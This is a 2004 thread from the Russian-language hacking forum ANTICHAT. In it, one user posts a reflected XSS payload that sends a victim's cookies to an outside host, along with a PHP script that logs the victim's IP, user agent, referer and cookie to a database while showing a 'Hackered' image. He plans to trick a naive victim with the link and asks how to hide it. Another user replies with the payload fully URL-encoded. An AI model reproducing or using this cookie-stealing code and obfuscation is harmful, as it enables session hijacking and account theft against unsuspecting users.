ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.11.2004, 10:34
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818
Репутация:
569
|
|
О! круто! Я догнал!!! А можно сделать так?
www.xxx.ru/?search=<script>document.images[0].src='http://www.yyy.ru/?с'+document.cookie;</script>
А в http://www.yyy.ru/ написать что-то типа
PHP код:
<?
$u_ip=htmlspecialchars(getenv("REMOTE_ADDR"), ENT_QUOTES);
$u_agent=htmlspecialchars(getenv("HTTP_USER_AGENT"), ENT_QUOTES);
$u_ref=htmlspecialchars(getenv("HTTP_REFERER"), ENT_QUOTES);
$u_cookie=htmlspecialchars($c, ENT_QUOTES);
mysql_unbuffered_query("INSERT INTO table VALUES('', '$u_ip', '$u_agent', '$u_ref', '$u_cookie')") or die();
header("Content-type: image/png");
$im=imagecreate(100, 100);
$bgcolor=imagecolorallocate($im, 255, 255, 255);
$tcolor=imagecolorallocate($im, 233, 14, 91);
imagestring($im, 1, 5, 5, "Hackered", $tcolor);
imagepng($im);
imagedestroy($im);
?>
Кинуть ламаку, типа на, погляди, я сайт ломанул, по идее его кука с этого сайта мне в БД, а он вместо первой картини сайта видит имагу 100 на 100 с надписью "Hackered", круто! Но есть одно но. Если он не такой и ламак, то перед тем как вставит код в браузер, проглядит его. Думаю его смутит строчка
http://www.yyy.ru/?с'+document.cookie... Что тогда делать? Ыдь у нас java-inj, помойму можно как-то зашифровать весь скрипт, типа чтоб нельзя бло увидеть код скрипта, чтоб были одни кракозяборы... Круто!!! Блин помогите, будет ли ваще все это вашенаписанное работать, и если да, то как зашифровать строку? Ребят, респект =) |
|
|
26.11.2004, 15:15
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Код:
xxx.ru/?search=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%69%6D%61%67%65%73%5B%30%5D%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%79%79%79%2E%72%75%2F%3F%F1%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
(без пробелов - их форум автоматически вставляет)
Последний раз редактировалось Algol; 26.11.2004 в 15:19..
|
|
|
|
26.11.2004, 18:52
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818
Репутация:
569
|
|
АААА =)))) че то до меня сразу то не дошло =))) все равно спасибо.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
